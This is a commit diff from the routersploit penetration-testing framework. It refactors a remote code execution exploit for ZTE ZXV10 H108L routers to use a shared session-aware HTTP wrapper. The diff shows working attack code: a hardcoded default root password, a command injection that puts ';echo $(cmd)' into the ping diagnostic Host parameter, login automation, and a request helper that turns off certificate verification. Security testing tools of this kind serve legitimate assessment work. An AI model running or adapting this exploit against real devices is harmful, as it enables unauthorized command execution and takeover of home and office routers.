Merge branch 'request-session'

devkw · Jan 11, 2017 · 1f0d903 · 1f0d903
2 parents 790377c + d7129b8
commit 1f0d903
Show file tree

Hide file tree

Showing 2 changed files with 12 additions and 11 deletions.
diff --git a/routersploit/modules/exploits/zte/zxv10_rce.py b/routersploit/modules/exploits/zte/zxv10_rce.py
@@ -10,6 +10,7 @@
     print_success,
     print_status,
     shell,
+    http_request,
 )
 
 
@@ -20,7 +21,8 @@ class Exploit(exploits.Exploit):
     """
     __info__ = {
         'name': 'ZTE ZXV10 RCE',
-        'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability that allows executing commands on operating system level.',
+        'description': 'Exploits ZTE ZXV10 H108L remote code execution vulnerability '
+                       'that allows executing commands on operating system level.',
         'authors': [
             'Anastasios Stasinopoulos',  # vulnerabiltiy discovery
             'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
@@ -39,8 +41,6 @@ class Exploit(exploits.Exploit):
     username = exploits.Option('root', 'Username to log in with')
     password = exploits.Option('W!n0&oO7.', 'Password to log in with')
 
-    session = None
-
     def __init__(self):
         self.session = requests.Session()
 
@@ -56,14 +56,15 @@ def run(self):
 
     def execute(self, cmd):
 
-        path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
+        path = "/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch&Host=;echo $({})&NumofRepeat=1&" \
+               "DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit".format(cmd)
         url = "{}:{}{}".format(self.target, self.port, path)
         try:
-            response = self.session.get(url)
+            response = http_request("GET", url, self.session)
             time.sleep(3)
 
             url = "{}:{}/getpage.gch?pid=1002&nextpage=manager_dev_ping_t.gch".format(self.target, self.port)
-            response = self.session.get(url)
+            response = http_request("GET", url, self.session)
             time.sleep(1)
 
             res = re.findall(r'textarea_1">(.*) -c', response.text)
@@ -87,7 +88,7 @@ def info(self):
         url = "{}:{}/template.gch".format(self.target, self.port)
 
         try:
-            response = self.session.get(url)
+            response = http_request("GET", url, self.session)
         except:
             return
 
@@ -115,7 +116,7 @@ def login(self):
         url = "{}:{}/".format(self.target, self.port)
 
         try:
-            response = self.session.get(url=url)
+            response = http_request("GET", url, self.session)
             if response is None:
                 return
 
@@ -132,7 +133,7 @@ def login(self):
                         "Username": self.username,
                         "Password": self.password}
 
-                response = self.session.post(url, data=data)
+                response = http_request("POST", url, self.session, data=data)
                 if "Username" not in response.text and "Password" not in response.text:
                     print_success("Successful authentication")
                     return True

diff --git a/routersploit/utils/__init__.py b/routersploit/utils/__init__.py
@@ -411,14 +411,14 @@ def random_text(length, alph=string.ascii_letters + string.digits):
     return ''.join(random.choice(alph) for _ in range(length))
 
 
-def http_request(method, url, **kwargs):
+def http_request(method, url, session=requests, **kwargs):
     """ Wrapper for 'requests' silencing exceptions a little bit. """
 
     kwargs.setdefault('timeout', 30.0)
     kwargs.setdefault('verify', False)
 
     try:
-        return getattr(requests, method.lower())(url, **kwargs)
+        return getattr(session, method.lower())(url, **kwargs)
     except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
         print_error("Invalid URL format: {}".format(url))
         return